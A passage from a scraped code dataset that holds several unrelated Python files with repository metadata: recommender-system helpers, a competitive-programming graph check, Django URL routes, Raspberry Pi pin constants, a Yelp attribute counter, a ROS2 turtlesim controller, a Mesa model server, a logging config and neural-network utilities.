date\ndef add_date(fdate, n):\n future_date = datetime.date.fromordinal(fdate.toordinal() + n)\n return future_date\n\n\n# for getting unique values from a column\ndef unique_values(series):\n new_series = series.unique()\n return new_series\n\n\n# for getting values from a column\ndef getting_values(series):\n new_series = list(series.get_values())\n if len(new_series) == 1:\n new_series = new_series[len(new_series)-1]\n return new_series\n else:\n return new_series\n\n\n# for extracting information between specific dates\ndef extract_range_information(df, column, start_value, end_value):\n df = df[(df[column] >= start_value) & (df[column] <= end_value)]\n return df\n\n\n# Extract information at a specific value\ndef extract_single_information(df, column, value):\n df = df[df[column] == value]\n return df\n\n\n# Calculating stats: total count\ndef total_stats(df, column_name):\n total_df = len(df[column_name].unique())\n return total_df\n\n\n# yesterday's stats\ndef yesterday_stats(df, column_name):\n ydate = yesterday_date(n=1)\n yesterday_count = len(df[df[column_name] == ydate])\n return yesterday_count\n\n\n# average over some number\ndef average_stats(df, avg_n):\n count = len(df)\n average = round(count/avg_n,2)\n return average\n\n\n# getting the last value of a dataframe\ndef last_value(df, column_name, n):\n value = df[column_name].tail(n).get_values()\n if len(value) == 1:\n value = value[len(value)-1]\n return value\n\n\n# extracting calender dates\ndef cal_dates(start_date, end_date):\n dates = pd.DataFrame({'Calender Dates': pd.date_range(start=start_date, end=end_date)})\n temp = pd.DatetimeIndex(dates['Calender Dates'])\n dates['Dates'] = temp.date\n return dates\n\n\ndef cal_dates_count(start_date, end_date):\n dates = pd.DataFrame({'Calender Dates': pd.date_range(start=start_date, end=end_date)})\n temp = pd.DatetimeIndex(dates['Calender Dates'])\n dates['Dates'] = temp.date\n return len(dates)\n\n\n# per day count\ndef per_day_count(date_series, df, column_date, count_column):\n count = []\n Date = []\n ids = []\n\n for d in date_series:\n df_d = df[df[column_date] == d]\n consumer_id = df_d['Consumer ID'].unique()\n df_one = np.sum(df_d[count_column])\n ids.append(consumer_id)\n if df_one != 0:\n count_per_day = df_one\n count.append(count_per_day)\n else:\n count_per_day = 0\n count.append(count_per_day)\n Date.append(d)\n\n df_new = pd.DataFrame({'Dates': Date, 'Count/day': count, 'Consumer IDs': ids})\n return df_new\n\n\n# convert string series into numeric\ndef convert_literal(series):\n ids = (series).apply(literal_eval).sum()\n return ids\n\n\n# Convert timestamp to date\ndef convert_timestamp(temp):\n temp = pd.to_datetime(temp)\n temp = temp.to_pydatetime(temp)\n temp = temp.date()\n return temp\n\n\n# Returns a dataframe calculating frequencies\ndef dataframe_frequencies(df, column1, column2):\n df_new = pd.DataFrame({column2 + '_frequency':\n df.groupby([column1, column2]).size()}).reset_index()\n return df_new\n\n\n# Returns merged dataframe\ndef dataframe_merging(df1, df2, column1, column2):\n df_new = pd.merge(df1, df2, how='left', left_on=[column1, column2], right_on=[column1, column2])\n return df_new\n\n\n# Scaled Ratings\ndef scaled_ratings(implicit_rating, a, b):\n\n x = []\n for i in range(0, len(implicit_rating)):\n x_new = a + ((implicit_rating[i] - np.min(implicit_rating)) * (b - a)) / (\n np.max(implicit_rating) - np.min(implicit_rating))\n x_new = round(x_new, 2)\n if m.isnan(x_new) and np.min(implicit_rating) == np.max(implicit_rating):\n x.append(b)\n else:\n x.append(x_new)\n return x\n\n\n# This function takes in dataframe with coupon views and outputs the raw implicit ratings\n# based on frequencies of selected criterias\ndef implicit_ratings(df_coupon, df_store):\n\n # Calculating frequencies for each criteria from same table\n df_user_coupon = dataframe_frequencies(df_coupon, 'user_id', 'coupon_id')\n df_coupon_category = dataframe_frequencies(df_coupon, 'user_id', 'category_id')\n df_coupon_discount = dataframe_frequencies(df_coupon, 'user_id', 'discount')\n df_coupon_retailer = dataframe_frequencies(df_coupon, 'user_id', 'retailer_id')\n df_coupon_store = dataframe_frequencies(df_store, 'user_id', 'retailer_id')\n\n # extract suitable ids from implicit ratings\n df_implicit_ratings = df_coupon[['user_id', 'coupon_id', 'category_id', 'retailer_id', 'discount']]\n df_implicit_ratings = df_implicit_ratings.drop_duplicates()\n\n # Merge frequencies and corresponding ids\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_user_coupon, 'user_id', 'coupon_id')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_category, 'user_id', 'category_id')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_discount, 'user_id', 'discount')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_store, 'user_id', 'retailer_id')\n df_implicit_ratings = dataframe_merging(df_implicit_ratings, df_coupon_retailer, 'user_id', 'retailer_id')\n\n # Filling zeros where frequencies are not available\n df_implicit_ratings.fillna(0, inplace=True)\n\n # Adding retailer frequencies because it is available both from coupon views and coupon ratings\n df_implicit_ratings['retailer_frequency'] = df_implicit_ratings['retailer_id_frequency_x'] + df_implicit_ratings[\n 'retailer_id_frequency_y']\n\n # Getting coupon ratings\n df_implicit_ratings = df_implicit_ratings[['user_id', 'coupon_id', 'coupon_id_frequency',\n 'category_id_frequency', 'discount_frequency',\n 'retailer_frequency']]\n\n # Taking average of retailer frequency\n df_implicit_ratings = df_implicit_ratings.groupby(['user_id', 'coupon_id', 'coupon_id_frequency',\n 'category_id_frequency',\n 'discount_frequency']).mean().reset_index()\n\n # Taking average of frequencies\n df_implicit_ratings['implicit_rating'] = df_implicit_ratings[['coupon_id_frequency', 'category_id_frequency',\n 'discount_frequency', 'retailer_frequency']].mean(axis=1)\n return df_implicit_ratings\n\n","repo_name":"sarwatfatimam/recommender-system","sub_path":"dealsmash.py","file_name":"dealsmash.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15195798369","text":"import sys\r\n\r\nn, m = map(int, input().split())\r\ned = [[] for _ in range(n)]\r\nv = [None] * n\r\nfor _ in range(m):\r\n\tl, r, d = map(int, input().split())\r\n\ted[l-1].append([r-1, d])\r\n\ted[r-1].append([l-1, -d])\r\n\r\nvisited = [False] * n\r\n\r\ndef dfs(start):\r\n\tglobal ed, v, visited\r\n\ts = [start]\r\n\tv[start] = 0\r\n\twhile s:\r\n\t\tlabel = s.pop()\r\n\t\tif visited[label] == False:\r\n\t\t\tvisited[label] = True\r\n\t\t\tfor e in ed[label]:\r\n\t\t\t\tif v[e[0]] is None:\r\n\t\t\t\t\tv[e[0]] = v[label] + e[1]\r\n\t\t\t\t\ts.append(e[0])\r\n\t\t\t\telse:\r\n\t\t\t\t\tif v[e[0]] != v[label] + e[1]:\r\n\t\t\t\t\t\tprint(\"No\")\r\n\t\t\t\t\t\tsys.exit()\r\n\treturn\r\n\r\nfor i in range(n):\r\n\tif v[i] is None:\r\n\t\tdfs(i)\r\n\r\nprint(\"Yes\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc090/B/3897504.py","file_name":"3897504.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"41109604195","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n # user login and authentication endpoints\n path('',views.UserView.as_view(),name=\"user\"),\n path('register',views.RegisterView.as_view(),name=\"register\"),\n path('login',views.LoginView.as_view(),name=\"login\"),\n path('logout',views.LogoutView.as_view(),name=\"logout\"),\n\n # product endpoint\n path('product',views.ProductView.as_view(),name=\"product\"),\n\n # category endpoint\n path('category',views.CategoryView.as_view(),name=\"category\"),\n\n # order endpoint\n path('order',views.OrderView.as_view(),name=\"order\"),\n]","repo_name":"code002-ZeroTwo/c2cecom","sub_path":"c2c/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38079302879","text":"#탐 : 당장의 결정이 향후의 수를 줄여줌\n#엘 : LIS(bisect)\n#이 : 이진트리로 구조화 시켜야하는경우(이진탐색트리)\n#디 : 전체루트를 한바퀴 검색하는경우\n#비 : 한루트를 끝까지 검새하는경우\n#다 : 캐싱이 반복적으로 사용되는경우\n#그 : 기타 그래프 이론(사이클관련)\n # 다익스트라\n # 플로이드워셜\n # 크루스칼\n\n#Idea\n#len(LIS) 와 그 LIS를 역추적한것의 경우의수 + 시작점\n#Code\nN = int(input());\nXY = [];\nfor i in range(N):\n XY.append(tuple(map(int,input().split(\" \"))))\n\nXY.sort(key=lambda x:(x[0],x[1]));\nsumForXY = [];\nfor i in XY :\n sumForXY.append(i[0]+i[1]);\nprint(XY);\nprint(sumForXY)\n#Case\n'''\n11\n8 6\n7 4\n5 4\n5 1\n5 6\n6 2\n3 2\n4 3\n4 5\n3 5\n2 4\n>>>\n4\n3\n'''","repo_name":"ysk0951/algorithm","sub_path":"2022/LIS/3133.py","file_name":"3133.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9507502845","text":"# Pins\nMOTOR1PIN1 = 26 # BOARD 37\nMOTOR1PIN2 = 19 # BOARD 35\nMOTOR1PIN3 = 13 # BOARD 33\nMOTOR1PIN4 = 6 # BOARD 31\n\nMOTOR2PIN1 = 21 # BOARD 40\nMOTOR2PIN2 = 20 # BOARD 38\nMOTOR2PIN3 = 16 # BOARD 36\nMOTOR2PIN4 = 12 # BOARD 32\n\nLEDPIN = 25 # BOARD 22\n\nSTART_CLEANING_PIN = 1 # BOARD 27\nDONE_CLEANING_PIN = 0 # BOARD 28\nSTOP_PIN = 5 # BOARD 29\n# BOARD 30 COMMON GND\n\nMOTOR1 = [MOTOR1PIN1, MOTOR1PIN2, MOTOR1PIN3, MOTOR1PIN4] # LONG \nMOTOR2 = [MOTOR2PIN1, MOTOR2PIN2, MOTOR2PIN3, MOTOR2PIN4] # SHORT\n\n# Colors\nPOSITIVE_GREEN = \"#6eff56\"\nNEGATIVE_RED = \"#ff3333\"\nCONFUSED_YELLOW = \"#fcff56\"\n\n# Distance\nHALF_STEPS_TO_1CM = 48.75\nGRID_SIDE_LENGTH = 3.2\nMAX_MOVES = 5\n","repo_name":"wilburlua910/CSC3003_OIP","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12412175603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 09:17:50 2022\n\n@author: storm\n\"\"\"\n\nimport json\nimport csv \nimport pandas as pd\n\ndata_business = []\n\n#10k lines - D:/Documents - HDD/GitHub/F22-DV4-03/Test for yelp datasets/yelp_academic_dataset_business_10000lines.json\n#full data - D:/ONEDRIVE_FREE_FOLDER/Uni-Datavidenskab/YELP/yelp_academic_dataset_business.json\n\nwith open('D:/ONEDRIVE_FREE_FOLDER/Uni-Datavidenskab/YELP/yelp_academic_dataset_business.json', encoding=\"utf8\") as f:\n for line in f:\n data_business.append(json.loads(line))\n \n\n\n\n\n\ndef string_seperate(string):\n n = 0\n cate_list = []\n string = string.replace('\"','')\n string = string.replace('}','')\n string = string.replace('{','')\n a_list = string.split(\", \")\n for element in a_list:\n cate_list.append(element)\n n = n +1\n return cate_list\n\n\n\n#Counts how many of each attribute that exists\n# mydict = {}\n# n = 0\n# attribute_list = []\n# value_list = [] \n# for i in data_business:\n# if data_business[n]['attributes'] != None:\n# keys, values = zip(*data_business[n]['attributes'].items())\n# for element in keys:\n# mydict[element] = mydict.get(element, 0) + 1\n# n = n + 1\n# if n % 1000 == 0:\n# print(n) \n\n# print(mydict)\n# df = pd.DataFrame(list(mydict.items()),columns = ['Attribute','Amount'])\n\n# df_sorted = df.sort_values(by='Amount', ascending=False)\n\n# df_sorted.to_csv('amount_of_attributes.csv', index=False) \n\n\n \n# n = 0\n# big_string = \"\"\n# for i in data_business:\n# if data_business[n]['attributes'] != None:\n# big_string = big_string + str(data_business[n]['attributes']) \n# n = n + 1\n# if n % 1000 == 0:\n# print(n) \n\n# print(big_string)\n\n# values = data_business[11]['attributes']['Ambience']['hipster']\n\n# print(values)\n# Counts how many of each attribute that exists\nmydict = {}\nn = 0\nattribute_list = []\nvalue_list = [] \nfor i in data_business:\n try:\n catagory_list = string_seperate(data_business[n]['attributes']['DietaryRestrictions'])\n for element in catagory_list:\n mydict[element] = mydict.get(element, 0) + 1\n n = n + 1\n if n % 1000 == 0:\n print(str(round(n/1500,2))+\"% done\")\n except:\n n = n + 1\n if n % 1000 == 0:\n print(str(round(n/1500,2))+\"% done\")\n \ndf = pd.DataFrame(list(mydict.items()),columns = ['Atmosphere','Amount'])\n\ndf_sorted = df.sort_values(by='Amount', ascending=False)\n\ndf_sorted.to_csv('DietaryRestrictions.csv', index=False) ","repo_name":"AAU-WebDataScience/F22-DV4-03","sub_path":"misc/count_attributes.py","file_name":"count_attributes.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70143552553","text":"#!/usr/bin/env python3\nfrom soupsieve import select\nimport math\nimport rclpy\nfrom functools import partial\nfrom rclpy.node import Node\nfrom turtlesim.msg import Pose\nfrom geometry_msgs.msg import Twist\nfrom my_robot_interfaces.msg import Turtle\nfrom my_robot_interfaces.msg import TurtleArray\nfrom my_robot_interfaces.srv import CatchTurtle\n\nclass TurtleControllerNode(Node): # MODIFY NAME\n def __init__(self):\n super().__init__(\"turtle_controller\") # MODIFY NAME\n self.turtle_to_catch = None\n #self.x_target = 4.0\n #self.y_target = 8.0\n \n self.pose_ = None\n self.pose_subscriber_ = self.create_subscription(\n Pose, \"turtle1/pose\", self.callback_turtle_pose, 10)\n \n self.alive_turtle_subscriber_ = self.create_subscription(\n TurtleArray, \"alive_turtles\", self.callback_alive_turtles, 10)\n self.cmd_vel_publisher_ = self.create_publisher(Twist, \"/turtle1/cmd_vel\", 10)\n\n self.control_loo_timer_ = self.create_timer(0.01, self.control_loop)\n\n def callback_turtle_pose(self, msg):\n self.pose_ = msg\n \n def callback_alive_turtles(self, msg):\n if len(msg.turtles)>0:\n self.turtle_to_catch = msg.turtles[0]\n \n\n def control_loop(self):\n if self.pose_ == None or self.turtle_to_catch == None:\n return\n \n x_dist = self.turtle_to_catch.x - self.pose_.x\n y_dist = self.turtle_to_catch.y - self.pose_.y\n target_dist = math.sqrt(x_dist * x_dist + y_dist * y_dist)\n\n msg = Twist()\n if target_dist > 0.5:\n #pose\n msg.linear.x = 2 * target_dist # tuning the distance by multiplying with 2 for better path \n\n #orientation\n target_theta = math.atan2(y_dist, x_dist)\n diff = target_theta - self.pose_.theta\n\n #normalize the angle\n if diff > math.pi:\n diff -= 2 * math.pi\n elif diff < -math.pi:\n diff += 2 * math.pi\n\n msg.angular.z = 6 * diff # tuning the angle by multiplying with 6 for better path \n \n\n else:\n #target reached \n msg.linear.x = 0.0\n msg.angular.z = 0.0\n self.call_catch_turtle_server(self.turtle_to_catch.name)\n self.turtle_to_catch = None\n\n self.cmd_vel_publisher_.publish(msg)\n\n def call_catch_turtle_server(self, turtle_name):\n client = self.create_client(CatchTurtle, \"catch_turtle\")\n while not client.wait_for_service(1.0):\n self.get_logger().warn(\"Waiting for Server...\")\n\n request = CatchTurtle.Request()\n request.name = turtle_name\n\n future = client.call_async(request)\n future.add_done_callback(\n partial(self.callback_call_catch_turtle, turtle_name=turtle_name))\n\n def callback_call_catch_turtle(self, future, turtle_name):\n try:\n response = future.result()\n if not response.success:\n self.get_logger().error(\"Turtle\" + str(turtle_name) + \"could not be caught\")\n\n except Exception as e:\n self.get_logger().error(\"Service call failed %r\" % (e,))\n\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = TurtleControllerNode() # MODIFY NAME\n rclpy.spin(node)\n rclpy.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chch1019/turtlesimsim_catch_them_all_py","sub_path":"turtlesimsim_catch_them_all_py/turtle_controller.py","file_name":"turtle_controller.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11491612059","text":"class Solution:\n # @param A : list of integers\n # @param B : integer\n # @return an integer\n def BinarySearch(self, A, l, r, b, order=1):\n while l <= r:\n mid = l + (r-l+1)//2\n if A[mid] == b:\n return mid\n elif A[mid] > b:\n if order == 1:\n r = mid - 1\n else:\n l = mid + 1\n else:\n if order == 1:\n l = mid + 1\n else:\n r = mid - 1\n return -1\n\n def BitonicSearch(self, arr, l, r):\n while l <= r:\n mid = l + (r-l+1)//2\n if arr[mid] > arr[mid-1]:\n ans = mid\n l = mid + 1\n else:\n r = mid - 1\n return ans\n\n def solve(self, A, B):\n\n if A[0] == B:\n return 0\n if A[-1] == B:\n return len(A) - 1\n\n start = 0\n end = len(A)-1\n\n bitonic_index = self.BitonicSearch(A, 0, len(A)-1)\n sa1 = sa2 = -1\n sa1 = self.BinarySearch(A, 0, bitonic_index, B)\n sa2 = self.BinarySearch(A, bitonic_index+1, len(A)-1, B, -1)\n return max(sa1, sa2)\n\n\nif __name__ == '__main__':\n s = Solution()\n A = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 19, 18, 17, 16, 15, 14, 13, 12, 11]\n B = 12\n print(s.solve(A, B))\n","repo_name":"akashdeep3194/Scaler","sub_path":"d48/Search in Bitonic Array!.py","file_name":"Search in Bitonic Array!.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"83943269","text":"import logging\n\nimport yatest.common\n\nfrom crypta.lib.python.yt import schema_utils\nfrom crypta.lib.python.yt.test_helpers import (\n tables,\n tests,\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_app_info_schema():\n return schema_utils.yt_schema_from_dict({\n \"BundleId\": \"string\",\n \"PlatformID\": \"uint64\",\n \"RegionName\": \"string\",\n \"Title\": \"string\",\n \"VendorName__raw\": \"string\",\n })\n\n\ndef get_apps_clustering_schema():\n return schema_utils.yt_schema_from_dict({\n \"app_id\": \"uint64\",\n \"bundle_id\": \"string\",\n \"cluster_id\": \"uint64\",\n \"devids_count\": \"uint64\",\n \"id_type\": \"string\",\n })\n\n\ndef test_build_apps_for_suggester(clean_local_yt, config, config_file, local_yt_and_yql_env):\n return tests.yt_test(\n yt_client=clean_local_yt.get_yt_client(),\n binary=yatest.common.binary_path(\"crypta/siberia/bin/custom_audience/build_apps_for_suggester/bin/crypta-siberia-custom-audience-build-apps-for-suggester\"),\n args=[\n \"--config\", config_file,\n ],\n data_path=yatest.common.test_source_path(\"data\"),\n input_tables=[\n (tables.get_yson_table_with_schema(\n 'app_info.yson',\n config.RmpAppsPath,\n schema=get_app_info_schema(),\n ), (tests.TableIsNotChanged())),\n (tables.get_yson_table_with_schema(\n 'apps_clustering.yson',\n config.AppsClusteringPath,\n schema=get_apps_clustering_schema(),\n ), (tests.TableIsNotChanged())),\n ],\n output_tables=[\n (tables.YsonTable('apps.yson', config.OutputPath, yson_format=\"pretty\"), [tests.Diff()]),\n ],\n env=local_yt_and_yql_env,\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/main (79).py","file_name":"main (79).py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15757833702","text":"from mesa.visualization.ModularVisualization import ModularServer\nfrom mesa.visualization.UserParam import UserSettableParameter\nfrom mesa.visualization.modules import CanvasGrid, ChartModule\n\nfrom src.money_model.model import MoneyModel\n\n\ndef agent_portrayal(agent):\n \"\"\"\n Rendering portrayal of an agent\n :param agent: agent to render\n :return: portrayal dict\n \"\"\"\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\"\n }\n\n if agent.wealth > 0:\n portrayal[\"Color\"] = \"red\"\n portrayal[\"Layer\"] = 0\n portrayal[\"r\"] = 0.5\n else:\n portrayal[\"Color\"] = \"grey\"\n portrayal[\"Layer\"] = 1\n portrayal[\"r\"] = 0.2\n\n return portrayal\n\n\n# canvas grid with dimensions 10 x 10, drawn in 500 x 500 pixels\ngrid = CanvasGrid(agent_portrayal, 10, 10, 500, 500)\n\n# plot gini\nchart = ChartModule([{\"Label\": \"Gini\",\n \"Color\": \"black\"\n }],\n data_collector_name=\"datacollector\"\n )\n\n# user-definable number of agents\n# parameter changes don't take place until the model is reset\nn_slider = UserSettableParameter(\"slider\", \"Number of Agents\", 100, 2, 200, 1)\n\n# create server\nserver = ModularServer(MoneyModel,\n [grid, chart],\n \"Money Model\",\n {\"N\": n_slider, \"width\": 10, \"height\": 10})\nserver.port = 8521 # default\nserver.launch()\n","repo_name":"SZanlongo/mesa-tutorial","sub_path":"src/money_model/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24571050929","text":"import os\nimport logging.config\nfrom tools.config_loader import conf\nfrom datetime import datetime\nfrom config.settings import Settings\n\n\nstandard_format = '[%(asctime)s] [%(levelname)s] [%(threadName)s] [%(name)s] | %(message)s'\nsimple_format = '[%(asctime)s] [%(levelname)s] [%(filename)s:%(lineno)d] | %(message)s'\n\nlogfile_dir = os.path.join(Settings.base_dir, 'log')\nlogfile_name = 'log{0}.log'.format(datetime.now().strftime('%Y-%m-%d'))\nos.makedirs(logfile_dir) if not os.path.isdir(logfile_dir) else ...\nlogfile_path = os.path.join(logfile_dir, logfile_name)\n\n\nLOGGING_DIC = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': standard_format\n },\n 'simple': {\n 'format': simple_format\n },\n },\n 'filters': {}, # filter可以不定义\n 'handlers': {\n # 打印到终端的日志\n 'console': {\n 'level': conf.get(\"terminal.level\"),\n 'class': 'logging.StreamHandler', # 打印到屏幕\n 'formatter': 'simple'\n },\n # 打印到文件的日志,收集info及以上的日志\n 'default': {\n 'level': conf.get(\"logger.level\"),\n 'class': 'logging.handlers.RotatingFileHandler',\n 'formatter': 'standard',\n 'filename': logfile_path,\n 'maxBytes': 1024 * 1024 * 100, # 日志大小100M (*****)\n 'backupCount': 5,\n 'encoding': 'utf-8',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['default', 'console'],\n 'level': conf.get(\"logger.level\").upper(),\n 'propagate': False, # 向上(更高level的logger)传递\n },\n },\n}\n\n\nlogging.config.dictConfig(LOGGING_DIC) # 导入上面定义的logging配置\nlogger = logging.getLogger(__name__) # 生成一个log实例\n\n\n","repo_name":"Zhangwenke-git/execution-engine","sub_path":"tools/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22596222396","text":"# -*- coding: utf-8 -*-\n\n# opt_utils.py\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport operator\nfrom functools import reduce\n\nimport numpy as np\n\ndef sigmoid(Z):\n \"\"\"\n Implements the sigmoid activation in numpy\n\n Arguments:\n Z -- numpy array of any shape\n\n Returns:\n A -- output of sigmoid(z), same shape as Z\n cache -- returns Z as well, useful during backpropagation\n \"\"\"\n\n A = 1/(1+np.exp(-Z))\n cache = Z\n\n return A, cache\n\ndef sigmoid_backward(dA, cache):\n \"\"\"\n Implement the backward propagation for a single SIGMOID unit.\n\n Arguments:\n dA -- post-activation gradient, of any shape\n cache -- 'Z' where we store for computing backward propagation efficiently\n\n Returns:\n dZ -- Gradient of the cost with respect to Z\n \"\"\"\n\n Z = cache\n\n s = 1/(1+np.exp(-Z))\n dZ = dA * s * (1-s)\n\n assert (dZ.shape == Z.shape)\n\n return dZ\n\ndef relu(Z):\n \"\"\"\n Implement the RELU function.\n\n Arguments:\n Z -- Output of the linear layer, of any shape\n\n Returns:\n A -- Post-activation parameter, of the same shape as Z\n cache -- a python dictionary containing \"A\" ; stored for computing the backward pass efficiently\n \"\"\"\n\n A = np.maximum(0,Z)\n\n assert(A.shape == Z.shape)\n\n cache = Z\n return A, cache\n\ndef relu_backward(dA, cache):\n \"\"\"\n Implement the backward propagation for a single RELU unit.\n\n Arguments:\n dA -- post-activation gradient, of any shape\n cache -- 'Z' where we store for computing backward propagation efficiently\n\n Returns:\n dZ -- Gradient of the cost with respect to Z\n \"\"\"\n\n Z = cache\n dZ = np.array(dA, copy=True) # just converting dz to a correct object.\n\n # When z <= 0, you should set dz to 0 as well.\n dZ[Z <= 0] = 0\n\n assert (dZ.shape == Z.shape)\n\n return dZ\n\n\n\n\n\ndef initialize_parameters(layer_dims):\n\n\n np.random.seed(3)\n parameters = {}\n L = len(layer_dims) # number of layers in the network\n\n for l in range(1, L):\n parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * np.sqrt(2 / layer_dims[l - 1])\n parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))\n\n # assert (parameters['W' + str(l)].shape == layer_dims[l], layer_dims[l - 1])\n # assert (parameters['W' + str(l)].shape == layer_dims[l], 1)\n\n return parameters\n\n\ndef linear_activation_forward(A_prev, W, b, activation):\n \"\"\"\n 实现LINEAR-> ACTIVATION 这一层的前向传播\n\n 参数:\n A_prev - 来自上一层(或输入层)的激活,维度为(上一层的节点数量,示例数)\n W - 权重矩阵,numpy数组,维度为(当前层的节点数量,前一层的大小)\n b - 偏向量,numpy阵列,维度为(当前层的节点数量,1)\n activation - 选择在此层中使用的激活函数名,字符串类型,【\"sigmoid\" | \"relu\"】\n\n 返回:\n A - 激活函数的输出,也称为激活后的值\n cache - 一个包含“linear_cache”和“activation_cache”的字典,我们需要存储它以有效地计算后向传递\n \"\"\"\n\n if activation == \"sigmoid\":\n Z, linear_cache = linear_forward(A_prev, W, b)\n A, activation_cache = sigmoid(Z)\n elif activation == \"relu\":\n Z, linear_cache = linear_forward(A_prev, W, b)\n A, activation_cache = relu(Z)\n\n assert (A.shape == (W.shape[0], A_prev.shape[1]))\n cache = (linear_cache, activation_cache)\n\n return A, cache\n\n\ndef linear_forward(A, W, b):\n \"\"\"\n 实现前向传播的线性部分。\n\n 参数:\n A - 来自上一层(或输入数据)的激活,维度为(上一层的节点数量,示例的数量)\n W - 权重矩阵,numpy数组,维度为(当前图层的节点数量,前一图层的节点数量)\n b - 偏向量,numpy向量,维度为(当前图层节点数量,1)\n\n 返回:\n Z - 激活功能的输入,也称为预激活参数\n cache - 一个包含“A”,“W”和“b”的字典,存储这些变量以有效地计算后向传递\n \"\"\"\n Z = np.dot(W, A) + b\n assert (Z.shape == (W.shape[0], A.shape[1]))\n cache = (A, W, b)\n\n return Z, cache\n\n\ndef forward_propagation(X, parameters):\n caches = []\n A = X\n L = len(parameters) // 2\n for l in range(1, L):\n A_prev = A\n A, cache = linear_activation_forward(A_prev, parameters['W' + str(l)], parameters['b' + str(l)], \"relu\")\n caches.append(cache)\n\n AL, cache = linear_activation_forward(A, parameters['W' + str(L)], parameters['b' + str(L)], \"sigmoid\")\n caches.append(cache)\n\n assert (AL.shape == (1, X.shape[1]))\n\n return AL, caches\n\n\ndef linear_backward(dZ, lambd, cache):\n \"\"\"\n 为单层实现反向传播的线性部分(第L层)\n\n 参数:\n dZ - 相对于(当前第l层的)线性输出的成本梯度\n cache - 来自当前层前向传播的值的元组(A_prev,W,b)\n\n 返回:\n dA_prev - 相对于激活(前一层l-1)的成本梯度,与A_prev维度相同\n dW - 相对于W(当前层l)的成本梯度,与W的维度相同\n db - 相对于b(当前层l)的成本梯度,与b维度相同\n \"\"\"\n\n A_prev, W, b = cache\n m = A_prev.shape[1]\n dW = np.dot(dZ, A_prev.T) / m + ((lambd * W) / m)\n db = np.sum(dZ, axis=1, keepdims=True) / m\n dA_prev = np.dot(W.T, dZ)\n\n assert (dA_prev.shape == A_prev.shape)\n assert (dW.shape == W.shape)\n assert (db.shape == b.shape)\n\n return dA_prev, dW, db\n\n\ndef linear_activation_backward(dA, cache, lambd,activation=\"relu\"):\n linear_cache, activation_cache = cache\n if activation == \"relu\":\n dZ = relu_backward(dA, activation_cache)\n dA_prev, dW, db = linear_backward(dZ, lambd, linear_cache)\n elif activation == \"sigmoid\":\n dZ = sigmoid_backward(dA, activation_cache)\n dA_prev, dW, db = linear_backward(dZ, lambd, linear_cache)\n\n return dA_prev, dW, db\n\n\ndef backward_propagation(AL, Y, caches,lambd):\n grads = {}\n L = len(caches)\n m = AL.shape[1]\n Y = Y.reshape(AL.shape)\n dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL))\n\n current_cache = caches[L-1]\n grads[\"dA\" + str(L)], grads[\"dW\" + str(L)], grads[\"db\" + str(L)] = linear_activation_backward(dAL, current_cache, lambd,\"sigmoid\")\n\n for l in reversed(range(L-1)):\n current_cache = caches[l]\n dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads[\"dA\" + str(l + 2)], current_cache,lambd, \"relu\")\n grads[\"dA\" + str(l + 1)] = dA_prev_temp\n grads[\"dW\" + str(l + 1)] = dW_temp\n grads[\"db\" + str(l + 1)] = db_temp\n\n return grads\n\n\ndef compute_cost(AL, Y,caches,lambd):\n m = Y.shape[1]\n cost = -np.sum(np.multiply(np.log(AL), Y) + np.multiply(np.log(1 - AL), 1 - Y)) / m\n\n L = len(caches)\n current_cache = caches[L - 1]\n linear_cache, activation_cache = current_cache\n A_prev, W, b = linear_cache\n L2_regularization_cost = lambd *(np.sum(np.square(W)))/ (2 * m)\n\n cost_all = cost + L2_regularization_cost\n\n return cost_all\n\n\ndef predict(X, y, parameters):\n \"\"\"\n This function is used to predict the results of a n-layer neural 